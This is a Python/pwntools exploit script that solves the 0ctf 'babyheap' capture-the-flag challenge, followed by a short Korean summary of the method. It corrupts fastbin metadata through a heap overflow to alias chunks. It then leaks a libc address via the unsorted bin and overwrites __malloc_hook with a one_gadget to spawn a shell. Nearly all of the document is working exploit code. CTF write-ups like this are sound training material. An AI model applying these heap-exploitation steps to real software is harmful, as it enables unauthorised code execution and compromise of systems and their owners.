0ctf-babyheap

from pwn import *
 
def allocate(size):
        """Menu option 1: ask the target to allocate ``size`` bytes.

        Only drives the prompts; the slot index the binary picks is not
        parsed here, so callers track indices by hand.
        """
        for prompt, answer in (('Command:', '1'), ('Size:', str(size))):
                sla(prompt, answer)
 
def fill(idx,size,fill):
        """Menu option 2: write ``size`` bytes of ``fill`` into slot ``idx``.

        The ``fill`` parameter shadows the function name inside this body;
        that is harmless because the body never calls itself. The payload
        goes out with ``sendafter`` rather than ``sendlineafter`` -
        presumably the target reads exactly ``size`` bytes, so a trailing
        newline would linger in the input and be eaten by the next menu
        prompt; confirm against the binary.
        """
        answers = (
                ('Command:', '2'),
                ('Index:', str(idx)),
                ('Size:', str(size)),
        )
        for prompt, answer in answers:
                sla(prompt, answer)
        sa('Content:', fill)
 
def free(idx):
        """Menu option 3: free the chunk held in slot ``idx``.

        Nothing here checks whether the slot is live; the exploit relies on
        the binary's own bookkeeping.
        """
        for prompt, answer in (('Command:', '3'), ('Index:', str(idx))):
                sla(prompt, answer)
 
def dump(idx):
        """Menu option 4: have the target print the contents of slot ``idx``.

        The output is left in the tube for the caller to consume (the leak
        step below does ``recvuntil`` / ``recv`` itself).
        """
        for prompt, answer in (('Command:', '4'), ('Index:', str(idx))):
                sla(prompt, answer)
 
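r=process('./babyheap',env={'LD_PRELOAD':'./libc.so.6'})
e=ELF('./babyheap')
# Take symbol offsets from the libc that is actually preloaded into the
# process. pwntools resolves ``e.libc`` through the system loader
# (ldd-style), so on a host whose libc differs from the bundled copy it
# would hand back offsets that do not match the leaked base.
libc=ELF('./libc.so.6')

sla=r.sendlineafter
sa=r.sendafter
ru=r.recvuntil

# These two offsets are tied to the bundled libc.so.6 and must be
# recomputed if that file changes:
#   MAIN_ARENA_OFF - libc base -> unsorted-bin head (main_arena+88), the
#                    value an unsorted chunk's fd/bk point at
#   ONE_GADGET     - execve("/bin/sh") gadget in this libc; such gadgets
#                    carry a register/stack constraint at call time, so
#                    re-check with one_gadget if no shell appears
MAIN_ARENA_OFF=0x3c4b78
ONE_GADGET=0x4526a

# Heap layout: four 0x20 chunks (slots 0-3) then one 0x90 chunk (slot 4).
# The slot numbers used below assume the binary hands out the lowest free
# slot index on every allocate - confirm against the binary.
for i in range(4):
        allocate(0x10)
allocate(0x80)

# fastbin[0x20]: 1 -> 2
free(2)
free(1)

# Overflow from slot 0 into slot 1's header: keep size 0x21, then replace
# the low byte of fd with 0x80 so it points at slot 4's chunk (0x80 bytes
# past slot 0 on the same heap page).
pay=p64(0)*3+p64(0x21)
pay+=p8(0x80)
fill(0,len(pay),pay)

# Overflow from slot 3 to shrink slot 4's size field to 0x21 so the forged
# fastbin entry passes malloc's size check for the 0x20 bin.
pay=p64(0)*3+p64(0x21)
fill(3,len(pay),pay)

# First allocate returns slot 1's chunk, the second returns slot 4's chunk
# as slot 2 - slots 2 and 4 now alias the same memory.
allocate(0x10)
allocate(0x10)

# Put the aliased chunk's real size (0x91) back so it is freed as a small
# chunk (unsorted bin) rather than as a fastbin entry.
pay=p64(0)*3+p64(0x91)
fill(3,len(pay),pay)

# A second 0x90 chunk keeps the aliased one away from top (otherwise the
# free would consolidate into top instead of landing in the unsorted bin);
# then free it through slot 4 while slot 2 still points at it.
allocate(0x80)
free(4)

# Read the freed chunk through the stale slot 2: its fd is main_arena+88.
dump(2)
ru('Content: \n')
# bytes literal so the ljust works under both Python 2 and Python 3 pwntools
leak=u64(r.recv(6).ljust(8,b'\x00'))-MAIN_ARENA_OFF
log.info(hex(leak))
# A libc base is page aligned; anything else means MAIN_ARENA_OFF does not
# belong to the preloaded libc and the writes below would just crash.
if leak & 0xfff:
        log.error('libc base %#x is not page aligned - wrong libc offsets?' % leak)

# Carve a 0x70 chunk out of the unsorted chunk (still aliased by slots 2
# and 4) and free it into fastbin[0x70].
allocate(0x68)
free(4)

# Overflow from slot 3 again: keep size 0x71 and point fd at a fake chunk
# just below __malloc_hook. At __malloc_hook-35 a 0x7f byte from a
# neighbouring libc pointer presumably acts as the size field and passes
# the 0x70-bin check (the usual glibc 2.23 target for this attack).
pay=p64(0)*3+p64(0x71)+p64(leak+libc.symbols['__malloc_hook']-35)
fill(3,len(pay),pay)

# First allocate returns the real chunk (slot 4), the second returns the
# fake chunk at __malloc_hook-35 (slot 6).
allocate(0x60)
allocate(0x60)

# Fake chunk user data starts at __malloc_hook-35+0x10 = __malloc_hook-19;
# 3 + 16 bytes of padding land the gadget address exactly on __malloc_hook.
pay=b'\x00'*3+p64(0)*2+p64(leak+ONE_GADGET)
fill(6,len(pay),pay)

# Any further malloc now goes through the overwritten hook.
allocate(12)

r.interactive()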
 

기본적인 fastbin attack이다. 힙 오버플로우로 인접 chunk의 size와 fastbin fd를 조작해 두 인덱스가 같은 메모리를 가리키게 만들고, 그 chunk를 unsorted bin에 넣어 libc 주소(main_arena+88)를 leak한 뒤, `__malloc_hook-35`의 가짜 chunk를 fastbin으로 할당받아 `__malloc_hook`을 one_gadget으로 덮어쓴다.